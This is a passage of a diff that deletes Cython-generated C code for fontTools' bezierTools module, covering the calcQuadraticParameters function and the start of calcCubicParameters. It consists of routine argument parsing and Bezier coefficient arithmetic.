__Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_50calcQuadraticParameters}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_51calcQuadraticParameters(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const 
*__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcQuadraticParameters (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 938, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 938, __pyx_L3_error) - else { - 
__Pyx_RaiseArgtupleInvalid("calcQuadraticParameters", 1, 3, 3, 1); __PYX_ERR(0, 938, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 938, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticParameters", 1, 3, 3, 2); __PYX_ERR(0, 938, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcQuadraticParameters") < 0)) __PYX_ERR(0, 938, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcQuadraticParameters", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 938, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticParameters", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_50calcQuadraticParameters(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); 
++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_50calcQuadraticParameters(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3) { - PyObject *__pyx_v_x2 = NULL; - PyObject *__pyx_v_y2 = NULL; - PyObject *__pyx_v_x3 = NULL; - PyObject *__pyx_v_y3 = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *(*__pyx_t_4)(PyObject *); - PyObject *__pyx_t_5 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcQuadraticParameters", 1); - - /* "fontTools/misc/bezierTools.py":939 - * - * def calcQuadraticParameters(pt1, pt2, pt3): - * x2, y2 = pt2 # <<<<<<<<<<<<<< - * x3, y3 = pt3 - * cx, cy = pt1 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt2))) || (PyList_CheckExact(__pyx_v_pt2))) { - PyObject* sequence = __pyx_v_pt2; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 939, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 939, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 939, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 939, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 939, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 939, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_x2 = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_y2 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":940 - * def calcQuadraticParameters(pt1, pt2, pt3): - * x2, y2 = pt2 - * x3, y3 = pt3 # <<<<<<<<<<<<<< - * cx, cy = pt1 - * bx = (x2 - cx) * 2.0 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt3))) || (PyList_CheckExact(__pyx_v_pt3))) { - PyObject* sequence = __pyx_v_pt3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 940, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = 
PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 940, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 940, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 940, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 940, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 940, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_x3 = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_y3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":941 - * x2, y2 = pt2 - * x3, y3 = pt3 - * cx, cy = pt1 # <<<<<<<<<<<<<< - * bx = (x2 - cx) * 2.0 - * by = (y2 - cy) * 2.0 - */ - if ((likely(PyTuple_CheckExact(__pyx_v_pt1))) || (PyList_CheckExact(__pyx_v_pt1))) { - PyObject* sequence = __pyx_v_pt1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 941, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - 
__pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 941, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 941, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - Py_ssize_t index = -1; - __pyx_t_3 = PyObject_GetIter(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 941, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); - index = 0; __pyx_t_1 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_4(__pyx_t_3); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_4(__pyx_t_3), 2) < 0) __PYX_ERR(0, 941, __pyx_L1_error) - __pyx_t_4 = NULL; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 941, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_cx = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_cy = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":942 - * x3, y3 = pt3 - * cx, cy = pt1 - * bx = (x2 - cx) * 2.0 # <<<<<<<<<<<<<< - * by = (y2 - cy) * 2.0 - * ax = x3 - cx - bx - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_x2, __pyx_v_cx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 942, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_2, __pyx_float_2_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 942, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - 
__Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_bx = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":943 - * cx, cy = pt1 - * bx = (x2 - cx) * 2.0 - * by = (y2 - cy) * 2.0 # <<<<<<<<<<<<<< - * ax = x3 - cx - bx - * ay = y3 - cy - by - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_y2, __pyx_v_cy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 943, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_1, __pyx_float_2_0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 943, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_by = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":944 - * bx = (x2 - cx) * 2.0 - * by = (y2 - cy) * 2.0 - * ax = x3 - cx - bx # <<<<<<<<<<<<<< - * ay = y3 - cy - by - * return (ax, ay), (bx, by), (cx, cy) - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_x3, __pyx_v_cx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 944, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_bx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 944, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_ax = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":945 - * by = (y2 - cy) * 2.0 - * ax = x3 - cx - bx - * ay = y3 - cy - by # <<<<<<<<<<<<<< - * return (ax, ay), (bx, by), (cx, cy) - * - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_y3, __pyx_v_cy); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 945, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Subtract(__pyx_t_1, __pyx_v_by); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 945, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_ay = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":946 - * ax = x3 - cx - bx - * ay = y3 - cy - by - * return (ax, ay), (bx, by), (cx, cy) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) 
__PYX_ERR(0, 946, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_ax); - __Pyx_GIVEREF(__pyx_v_ax); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_ax)) __PYX_ERR(0, 946, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_ay); - __Pyx_GIVEREF(__pyx_v_ay); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_ay)) __PYX_ERR(0, 946, __pyx_L1_error); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 946, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_bx); - __Pyx_GIVEREF(__pyx_v_bx); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_bx)) __PYX_ERR(0, 946, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_by); - __Pyx_GIVEREF(__pyx_v_by); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_by)) __PYX_ERR(0, 946, __pyx_L1_error); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 946, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_cx); - __Pyx_GIVEREF(__pyx_v_cx); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_cx)) __PYX_ERR(0, 946, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_cy); - __Pyx_GIVEREF(__pyx_v_cy); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_cy)) __PYX_ERR(0, 946, __pyx_L1_error); - __pyx_t_5 = PyTuple_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 946, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_2)) __PYX_ERR(0, 946, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_1)) __PYX_ERR(0, 946, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_t_3)) __PYX_ERR(0, 946, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_1 = 0; - __pyx_t_3 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":938 - * - * - * def calcQuadraticParameters(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - 
__Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticParameters", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_x2); - __Pyx_XDECREF(__pyx_v_y2); - __Pyx_XDECREF(__pyx_v_x3); - __Pyx_XDECREF(__pyx_v_y3); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":949 - * - * - * def calcCubicParameters(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_53calcCubicParameters(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_52calcCubicParameters, "calcCubicParameters(pt1, pt2, pt3, pt4)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_53calcCubicParameters = {"calcCubicParameters", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_53calcCubicParameters, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_52calcCubicParameters}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_53calcCubicParameters(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject 
*const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcCubicParameters (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 949, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 949, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicParameters", 1, 4, 4, 1); __PYX_ERR(0, 949, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - 
(void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 949, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicParameters", 1, 4, 4, 2); __PYX_ERR(0, 949, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 949, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicParameters", 1, 4, 4, 3); __PYX_ERR(0, 949, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcCubicParameters") < 0)) __PYX_ERR(0, 949, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcCubicParameters", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 949, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicParameters", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = 
